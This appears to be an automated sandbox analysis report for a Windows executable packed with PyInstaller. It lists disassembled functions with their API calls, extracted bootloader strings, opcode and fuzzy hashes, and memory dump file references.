API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: 4f385c050b1ac2fe5a16746e0c722cac608957b1a3a53f9db8b3d68cb00aa283
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 83D12772F08A8189E711DFA9C8401AC77B1FB54798B804136EF5D97BA5DE3CD026CB50

Function 00007FF72B8EF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B8EFA7C
_get_daylight.LIBCMT ref: 00007FF72B8EFA8D
_get_daylight.LIBCMT ref: 00007FF72B8EFA9E
_isindst.LIBCMT ref: 00007FF72B8EFB69

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: 5a7f4daf20304a41f27350cdf1ee20dece8677ceb499695c4cf74e1cd4c1f79f
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: BD512672F042518AFB14EFAC8D512BCB7A1EB94358F900235ED1E56AF5DB3CA412CB90

Function 00007FF72B8E577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF72B8E57AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF72B8E5811
GetLastError.KERNEL32 ref: 00007FF72B8E58A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B8E56B4), ref: 00007FF72B8E58EE

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 2f24abde66671557383f75fb841428b307ea6480aee86167773f731e194cab37
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: 59518322E0868186F710EFB9D8503BDA7E1EB48B58F944534EE0D576A6DF3CD460CBA0

Function 00007FF72B8D20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF72B8D20F4
SetWindowLongPtrW.USER32 ref: 00007FF72B8D2116
GetWindowLongPtrW.USER32 ref: 00007FF72B8D2140
InvalidateRect.USER32 ref: 00007FF72B8D2160

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 7ff1907a10a08964698fbcc74b5cd8991868b58e92a2668f9edb667ad41e2055
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: BA11A921E1C15382FA54AF7EEE442799251EF98790FC88031DB8D07BA9CD2DE4F58B51

Function 00007FF72B8F5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8F1760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F1793

_get_daylight.LIBCMT ref: 00007FF72B8F5C34
_get_daylight.LIBCMT ref: 00007FF72B8F5C45

Strings

?, xrefs: 00007FF72B8F5BC5

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction ID: 73d4ee4c47f8bfd6ef6ba82008a5ec7f449486a0703dce03ef4f8fbf4e4ff13d
Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction Fuzzy Hash: B841F912A1828255FB70A7299C413B9E690EBA0BE4FD44235EE5D06AF6DF3CE4618F50

Function 00007FF72B8E9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E9046

Part of subcall function 00007FF72B8EA948: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA95E
Part of subcall function 00007FF72B8EA948: GetLastError.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72B8DCBA5), ref: 00007FF72B8E9064

Strings

C:\Users\user\Desktop\iqA8j9yGcd.exe, xrefs: 00007FF72B8E9052

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\iqA8j9yGcd.exe
API String ID: 2553983749-2164264409
Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction ID: 844aa4fb982e8bc88a812d91af634d68c4687ec18510fa5b31eac185c387588f
Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction Fuzzy Hash: CB418132A0878285EB15BF699C400BDB394EB85BD0BD55035FA4D47BA5DE3CE4A18BA0

Function 00007FF72B8ECC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF72B8ECD4F
GetLastError.KERNEL32 ref: 00007FF72B8ECD71

Strings

U, xrefs: 00007FF72B8ECCFB

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: e570704cb0f9cca3d0c63bed77256de2895664ab802a335f9c5031bf13e2c607
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: 7041B322B18A8185DB21AF69E8443A9A7A0FB98784F804131EF4D877A8DF3CD411CF90

Function 00007FF72B8EF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B8EF5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B8EF64A

Strings

:, xrefs: 00007FF72B8EF60E

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction ID: 0b2a70341f1aa0d89077eb7aee2c9ab433a74b30ec8bff10f1d4663c2df75893
Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction Fuzzy Hash: 2821D562A186C182FB20AB19D84426DB3B1FB98B44FC54035EA8D476B4DF7CE554CFA1

Function 00007FF72B8DFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF72B8DFD98
RaiseException.KERNEL32 ref: 00007FF72B8DFDD9

Strings

csm, xrefs: 00007FF72B8DFDC6

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: f1e6d0269ce32a913284007e1048f6963f5495266b85d49d552d711fb9601528
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 58113032618B8282EB619F29F840259B7E4FB98B94F984231DF8D47768DF3CD561CB40

Function 00007FF72B8F073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F076C
GetDriveTypeW.KERNEL32 ref: 00007FF72B8F07AC

Strings

:, xrefs: 00007FF72B8F0795

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 7cfb3cf54fc58716a907265244fdf37c45b876f84bc14dfd2667e1ba02255490
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 5701D46191C603C6FB20BF689C2127EA3A0EF69744FC40035E64C422A1DE3CE5208F64

Analysis Process: iqA8j9yGcd.exePID: 7364, Parent PID: 7308COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	703
Total number of Limit Nodes:	12

Executed Functions

Function 00007FF72B8D1000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF72B8D3D35
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF72B8D3BE8
Could not create temporary directory!, xrefs: 00007FF72B8D3CBF
_PYI_SPLASH_IPC, xrefs: 00007FF72B8D3A23, 00007FF72B8D3EED
pyi-disable-windowed-traceback, xrefs: 00007FF72B8D3BB2
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF72B8D3971
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF72B8D3E9E
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF72B8D3A0B, 00007FF72B8D3CD4, 00007FF72B8D3F63
Failed to load splash screen resources!, xrefs: 00007FF72B8D3E7D
MEI, xrefs: 00007FF72B8D3933
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF72B8D3C61
Failed to start splash screen!, xrefs: 00007FF72B8D3ECC
Py_GIL_DISABLED, xrefs: 00007FF72B8D3AF4
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF72B8D3B32
pyi-runtime-tmpdir, xrefs: 00007FF72B8D3B68
pyi-python-flag, xrefs: 00007FF72B8D3AD6
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF72B8D39DE
Failed to convert DLL search path!, xrefs: 00007FF72B8D3DD4
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF72B8D3882, 00007FF72B8D38AF
VCRUNTIME140.dll, xrefs: 00007FF72B8D3DA9
Failed to remove temporary directory: %s, xrefs: 00007FF72B8D3FC7
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF72B8D3D12
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF72B8D3EB3
pkg, xrefs: 00007FF72B8D39BE
pyi-contents-directory, xrefs: 00007FF72B8D3B8D
_PYI_ARCHIVE_FILE, xrefs: 00007FF72B8D38D2, 00007FF72B8D39FF
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF72B8D3A17, 00007FF72B8D3A2F, 00007FF72B8D3A9B
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF72B8D3E02

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: 161d7ea45765e57aa5736e45bba3574a103c8d2e72b885c58d3d9a0d8456624f
Instruction ID: d85930d1f800096ed080bd59ec409818a2990b87a661af296c31cf9fdb8b62ed
Opcode Fuzzy Hash: 161d7ea45765e57aa5736e45bba3574a103c8d2e72b885c58d3d9a0d8456624f
Instruction Fuzzy Hash: 57326C21A0C68391EA15BB399C543B9A661EF55780FC48037DA4D436E6EF2CF578CBA0

Function 00007FF72B8F6964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B8F6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F66D9
Part of subcall function 00007FF72B8F6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F6757
Part of subcall function 00007FF72B8F6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F67A8

CreateFileW.KERNELBASE ref: 00007FF72B8F6A6A
CreateFileW.KERNEL32 ref: 00007FF72B8F6ABA
GetLastError.KERNEL32 ref: 00007FF72B8F6AEA
GetFileType.KERNELBASE ref: 00007FF72B8F6AFF
GetLastError.KERNEL32 ref: 00007FF72B8F6B09
CloseHandle.KERNEL32 ref: 00007FF72B8F6B3C
CloseHandle.KERNEL32 ref: 00007FF72B8F6C9F
CreateFileW.KERNEL32 ref: 00007FF72B8F6CD4
GetLastError.KERNEL32 ref: 00007FF72B8F6CE3

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: 68b01a4094e01a038931819906fa1fbeff0445e3d0d5c72f6f3d180015639732
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 01C1D532B24A4285EB10EFA9C8912AC7761F759B98F851335DE1E577E4CF38E061CB90

Function 00007FF72B8D9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF72B8D92B3
FindClose.KERNELBASE ref: 00007FF72B8D92C2

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: dc15e4296e294a6dc4e00f563f9e6b041f4818ca06bd39d5e81d0675c77d0aaa
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: BAF04462A1864386F7609B68B899766B350EB84764FC40336DA7D026E4DF3CD0598F54

Function 00007FF72B8D1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B8D7F90: _fread_nolock.LIBCMT ref: 00007FF72B8D803A

_fread_nolock.LIBCMT ref: 00007FF72B8D1A1B

Part of subcall function 00007FF72B8D2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72B8D1B6A), ref: 00007FF72B8D295E

Strings

Could not read full TOC!, xrefs: 00007FF72B8D1B55
Could not allocate buffer for TOC!, xrefs: 00007FF72B8D1B1B
Failed to read cookie!, xrefs: 00007FF72B8D1A2B
fread, xrefs: 00007FF72B8D1A32, 00007FF72B8D1B5C
MEI, xrefs: 00007FF72B8D1991
Failed to seek to cookie position!, xrefs: 00007FF72B8D19EE
malloc, xrefs: 00007FF72B8D1B22
Could not allocate memory for archive structure!, xrefs: 00007FF72B8D1A61
calloc, xrefs: 00007FF72B8D1A68
fseek, xrefs: 00007FF72B8D19F5
Error on file., xrefs: 00007FF72B8D1B8D

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 19b2d90fb116042177e87122770855785b691cce0cf8b6a245a46221c5206fe9
Instruction ID: dc880a681ca35c9639bdb24bc76be4603b3a6ccfab25fe4b81d02fd5faeba3dc
Opcode Fuzzy Hash: 19b2d90fb116042177e87122770855785b691cce0cf8b6a245a46221c5206fe9
Instruction Fuzzy Hash: 7181B871A0C68785EB10FB2DD8416B9A3A0EF48784FC44532E98D477A5DE3CE5A58FA0

Function 00007FF72B8D1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fread, xrefs: 00007FF72B8D15E6
malloc, xrefs: 00007FF72B8D151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B8D15DF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B8D149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF72B8D1518
fseek, xrefs: 00007FF72B8D14E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B8D14DE

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 3b80d661a596547bf866741e2a38b529870fc82556ae20f68faf990c170632bb
Instruction ID: 8f813819b6be0905e9e9ae8a2eef6f5c87abca285ad1e5ec01dfa768809c8fc0
